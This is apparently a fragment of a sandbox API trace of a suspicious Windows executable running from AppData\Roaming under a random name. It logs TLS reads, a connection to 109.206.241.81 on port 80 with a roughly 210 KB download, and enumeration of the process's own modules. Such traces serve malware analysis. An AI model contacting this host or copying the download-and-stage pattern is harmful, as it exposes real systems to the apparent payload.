buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.617] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ee0f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ee0f8, pfQOP=0x0) returned 0x0 [0139.617] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.617] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.618] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ee20c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ee20c, pfQOP=0x0) returned 0x0 [0139.618] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.618] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.618] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ee320, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ee320, pfQOP=0x0) returned 0x0 [0139.618] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.618] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.618] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ee434, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ee434, pfQOP=0x0) returned 0x0 [0139.618] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.618] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.618] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ee548, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ee548, pfQOP=0x0) returned 0x0 [0139.618] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.618] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.618] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ee65c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ee65c, pfQOP=0x0) returned 0x0 [0139.619] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.619] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.619] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ee770, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ee770, pfQOP=0x0) returned 0x0 [0139.620] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.620] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.620] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ee884, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ee884, pfQOP=0x0) returned 0x0 [0139.620] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.621] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.621] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ee998, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ee998, pfQOP=0x0) returned 0x0 [0139.621] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.621] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.621] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22eeaac, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22eeaac, pfQOP=0x0) returned 0x0 [0139.621] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.621] recv (in: s=0x4ec, buf=0x22c5dbd, len=1305, flags=0 | out: buf=0x22c5dbd*) returned 1305 [0139.621] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22eebc0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22eebc0, pfQOP=0x0) returned 0x0 [0139.621] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.621] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.621] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22eecd4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22eecd4, pfQOP=0x0) returned 0x0 [0139.621] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.621] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.621] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22eede8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22eede8, pfQOP=0x0) returned 0x0 [0139.622] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.622] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.622] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22eeefc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22eeefc, pfQOP=0x0) returned 0x0 [0139.622] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.622] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.622] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ef010, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ef010, pfQOP=0x0) returned 0x0 [0139.622] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.622] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.622] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ef124, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ef124, pfQOP=0x0) returned 0x0 [0139.622] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.622] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.622] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ef238, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ef238, pfQOP=0x0) returned 0x0 [0139.623] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.623] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.623] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ef34c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ef34c, pfQOP=0x0) returned 0x0 [0139.623] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.623] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.623] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ef460, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ef460, pfQOP=0x0) returned 0x0 [0139.623] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.623] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.623] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ef574, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ef574, pfQOP=0x0) returned 0x0 [0139.623] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.623] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.623] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ef688, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ef688, pfQOP=0x0) returned 0x0 [0139.623] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.624] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.624] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ef79c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ef79c, pfQOP=0x0) returned 0x0 [0139.624] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.624] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.624] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ef8b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ef8b0, pfQOP=0x0) returned 0x0 [0139.624] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.624] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.624] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22ef9c4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22ef9c4, pfQOP=0x0) returned 0x0 [0139.624] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.624] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.624] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22efad8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22efad8, pfQOP=0x0) returned 0x0 [0139.624] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.624] recv (in: s=0x4ec, buf=0x22c5dbd, len=1393, flags=0 | out: buf=0x22c5dbd*) returned 1393 [0139.625] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22efbec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22efbec, pfQOP=0x0) returned 0x0 [0139.625] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.625] recv (in: s=0x4ec, buf=0x22c5dbd, len=4253, flags=0 | out: buf=0x22c5dbd*) returned 4253 [0139.625] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22efd00, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22efd00, pfQOP=0x0) returned 0x0 [0139.625] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.625] recv (in: s=0x4ec, buf=0x22c5dbd, len=4253, flags=0 | out: buf=0x22c5dbd*) returned 4253 [0139.625] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22efe14, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22efe14, pfQOP=0x0) returned 0x0 [0139.625] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.625] recv (in: s=0x4ec, buf=0x22c5dbd, len=3799, flags=0 | out: buf=0x22c5dbd*) returned 3799 [0139.625] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22eff28, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22eff28, pfQOP=0x0) returned 0x0 [0139.626] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.626] recv (in: s=0x4ec, buf=0x22c5dbd, len=4253, flags=0 | out: buf=0x22c5dbd*) returned 4253 [0139.626] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22f003c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22f003c, pfQOP=0x0) returned 0x0 [0139.626] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.627] recv (in: s=0x4ec, buf=0x22c5dbd, len=4253, flags=0 | out: buf=0x22c5dbd*) returned 4253 [0139.627] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22f0164, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22f0164, pfQOP=0x0) returned 0x0 [0139.627] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.627] recv (in: s=0x4ec, buf=0x22c5dbd, len=4253, flags=0 | out: buf=0x22c5dbd*) returned 4253 [0139.627] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22f0278, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22f0278, pfQOP=0x0) returned 0x0 [0139.627] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.627] recv (in: s=0x4ec, buf=0x22c5dbd, len=4253, flags=0 | out: buf=0x22c5dbd*) returned 4253 [0139.627] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22f038c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22f038c, pfQOP=0x0) returned 0x0 [0139.627] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.627] recv (in: s=0x4ec, buf=0x22c5dbd, len=4253, flags=0 | out: buf=0x22c5dbd*) returned 4253 [0139.627] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22f04a0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22f04a0, pfQOP=0x0) returned 0x0 [0139.628] recv (in: s=0x4ec, buf=0x22c5db8, len=5, flags=0 | out: buf=0x22c5db8*) returned 5 [0139.628] recv (in: s=0x4ec, buf=0x22c5dbd, len=383, flags=0 | out: buf=0x22c5dbd*) returned 383 [0139.628] DecryptMessage (in: phContext=0x22aff04, pMessage=0x22f05b4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x22f05b4, pfQOP=0x0) returned 0x0 [0139.628] SetEvent (hEvent=0x294) returned 1 [0139.646] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15400, lpName=0x0) returned 0x608 [0139.647] memcpy (in: _Dst=0x46d0000, _Src=0x32894f0, _Size=0x15400 | out: _Dst=0x46d0000) returned 0x46d0000 [0139.648] CloseHandle (hObject=0x608) returned 1 [0139.706] QueryPerformanceCounter (in: lpPerformanceCount=0x19f3ec | out: lpPerformanceCount=0x19f3ec*=3620554422195) returned 1 [0139.706] SetEvent (hEvent=0x294) returned 1 [0139.706] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f1f8*=0x358, lpdwindex=0x19f014 | out: lpdwindex=0x19f014) returned 0x80010115 [0139.707] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f1d8*=0x348, lpdwindex=0x19eff4 | out: lpdwindex=0x19eff4) returned 0x80010115 [0139.707] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f1d8*=0x350, lpdwindex=0x19eff4 | out: lpdwindex=0x19eff4) returned 0x80010115 [0139.707] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f22c*=0x378, lpdwindex=0x19f04c | out: lpdwindex=0x19f04c) returned 0x80010115 [0139.707] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f22c*=0x380, lpdwindex=0x19f04c | out: lpdwindex=0x19f04c) returned 0x80010115 [0139.708] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f22c*=0x388, lpdwindex=0x19f04c | out: lpdwindex=0x19f04c) returned 0x80010115 [0139.708] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f200*=0x518, lpdwindex=0x19f01c | out: lpdwindex=0x19f01c) returned 0x80010115 [0139.709] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f200*=0x520, lpdwindex=0x19f01c | out: lpdwindex=0x19f01c) returned 0x80010115 [0139.710] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x614 [0139.711] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x618 [0139.721] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f074*=0x518, lpdwindex=0x19ee94 | out: lpdwindex=0x19ee94) returned 0x80010115 [0139.722] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f074*=0x520, lpdwindex=0x19ee94 | out: lpdwindex=0x19ee94) returned 0x80010115 [0139.723] WSAConnect (in: s=0x614, name=0x2301ffc*(sa_family=2, sin_port=0x50, sin_addr="109.206.241.81"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0139.748] closesocket (s=0x618) returned 0 [0139.748] send (s=0x614, buf=0x22ae434*, len=80, flags=0) returned 80 [0139.749] setsockopt (s=0x614, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0139.749] recv (in: s=0x614, buf=0x22a81f4, len=4096, flags=0 | out: buf=0x22a81f4*) returned 4096 [0139.781] setsockopt (s=0x614, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0139.781] recv (in: s=0x614, buf=0x2312ab8, len=65536, flags=0 | out: buf=0x2312ab8*) returned 10504 [0139.781] recv (in: s=0x614, buf=0x2312ab8, len=65536, flags=0 | out: buf=0x2312ab8*) returned 65536 [0139.847] recv (in: s=0x614, buf=0x2312ab8, len=65536, flags=0 | out: buf=0x2312ab8*) returned 1624 [0139.847] recv (in: s=0x614, buf=0x2312ab8, len=65536, flags=0 | out: buf=0x2312ab8*) returned 65536 [0139.934] recv (in: s=0x614, buf=0x2312ab8, len=65536, flags=0 | out: buf=0x2312ab8*) returned 20604 [0139.934] recv (in: s=0x614, buf=0x2312ab8, len=46446, flags=0 | out: buf=0x2312ab8*) returned 46446 [0140.654] CoCreateGuid (in: pguid=0x19c840 | out: pguid=0x19c840*(Data1=0x51d9186e, Data2=0x1a5d, Data3=0x4246, Data4=([0]=0x9b, [1]=0x2f, [2]=0x75, [3]=0xbe, [4]=0xfb, [5]=0x3c, [6]=0x9, [7]=0x95))) returned 0x0 [0140.972] GetCurrentProcessId () returned 0xbb4 [0140.977] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb4) returned 0x628 [0140.977] EnumProcessModules (in: hProcess=0x628, lphModule=0x2389c04, cb=0x100, lpcbNeeded=0x19e664 | out: lphModule=0x2389c04, lpcbNeeded=0x19e664) returned 1 [0140.982] EnumProcessModules (in: hProcess=0x628, lphModule=0x2389d10, cb=0x200, lpcbNeeded=0x19e664 | out: lphModule=0x2389d10, lpcbNeeded=0x19e664) returned 1 [0140.983] GetModuleInformation (in: hProcess=0x628, hModule=0x400000, lpmodinfo=0x2389f50, cb=0xc | out: lpmodinfo=0x2389f50*(lpBaseOfDll=0x400000, SizeOfImage=0x8000, EntryPoint=0x0)) returned 1 [0140.983] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.983] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x400000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe") returned 0x3a [0140.984] CoTaskMemFree (pv=0x558e10) [0140.984] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.984] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x400000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe")) returned 0x60 [0140.984] CoTaskMemFree (pv=0x558e10) [0140.984] GetModuleInformation (in: hProcess=0x628, hModule=0x771d0000, lpmodinfo=0x238c15c, cb=0xc | out: lpmodinfo=0x238c15c*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0140.985] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.985] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x771d0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0140.985] CoTaskMemFree (pv=0x558e10) [0140.985] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.985] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x771d0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0140.985] CoTaskMemFree (pv=0x558e10) [0140.985] GetModuleInformation (in: hProcess=0x628, hModule=0x6f850000, lpmodinfo=0x238e260, cb=0xc | out: lpmodinfo=0x238e260*(lpBaseOfDll=0x6f850000, SizeOfImage=0x59000, EntryPoint=0x6f860780)) returned 1 [0140.985] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.985] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x6f850000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0140.986] CoTaskMemFree (pv=0x558e10) [0140.986] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.986] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x6f850000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0140.986] CoTaskMemFree (pv=0x558e10) [0140.986] GetModuleInformation (in: hProcess=0x628, hModule=0x76720000, lpmodinfo=0x239036c, cb=0xc | out: lpmodinfo=0x239036c*(lpBaseOfDll=0x76720000, SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0140.986] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.986] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x76720000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0140.987] CoTaskMemFree (pv=0x558e10) [0140.987] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.987] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x76720000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0140.988] CoTaskMemFree (pv=0x558e10) [0140.988] GetModuleInformation (in: hProcess=0x628, hModule=0x76910000, lpmodinfo=0x2392480, cb=0xc | out: lpmodinfo=0x2392480*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0140.988] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.988] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x76910000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0140.988] CoTaskMemFree (pv=0x558e10) [0140.988] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.988] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x76910000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0140.989] CoTaskMemFree (pv=0x558e10) [0140.989] GetModuleInformation (in: hProcess=0x628, hModule=0x73e50000, lpmodinfo=0x23945c8, cb=0xc | out: lpmodinfo=0x23945c8*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0140.989] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.989] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x73e50000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0140.989] CoTaskMemFree (pv=0x558e10) [0140.989] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.989] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x73e50000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0140.990] CoTaskMemFree (pv=0x558e10) [0140.990] GetModuleInformation (in: hProcess=0x628, hModule=0x76600000, lpmodinfo=0x23966d4, cb=0xc | out: lpmodinfo=0x23966d4*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0140.990] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.990] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x76600000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0140.990] CoTaskMemFree (pv=0x558e10) [0140.990] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.990] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x76600000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0140.991] CoTaskMemFree (pv=0x558e10) [0140.991] GetModuleInformation (in: hProcess=0x628, hModule=0x76a90000, lpmodinfo=0x23987e8, cb=0xc | out: lpmodinfo=0x23987e8*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0140.991] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.991] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x76a90000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0140.992] CoTaskMemFree (pv=0x558e10) [0140.992] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.992] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x76a90000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0140.992] CoTaskMemFree (pv=0x558e10) [0140.992] GetModuleInformation (in: hProcess=0x628, hModule=0x76cb0000, lpmodinfo=0x239a8f4, cb=0xc | out: lpmodinfo=0x239a8f4*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0140.992] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.992] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x76cb0000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0140.993] CoTaskMemFree (pv=0x558e10) [0140.993] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.993] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x76cb0000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0140.993] CoTaskMemFree (pv=0x558e10) [0140.993] GetModuleInformation (in: hProcess=0x628, hModule=0x76c00000, lpmodinfo=0x239ca4c, cb=0xc | out: lpmodinfo=0x239ca4c*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0140.994] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.994] GetModuleBaseNameW (in: hProcess=0x628, hModule=0x76c00000, lpBaseName=0x558e10, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0140.998] CoTaskMemFree (pv=0x558e10) [0140.998] CoTaskMemAlloc (cb=0x804) returned 0x558e10 [0140.998] GetModuleFileNameExW (in: hProcess=0x628, hModule=0x76c00000, lpFilename=0x558e10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0140.999] CoTaskMemFree (pv=0x558e10) [0140.999] GetModuleInformation (in: hProcess=0x628, hModule=0x73f00000, 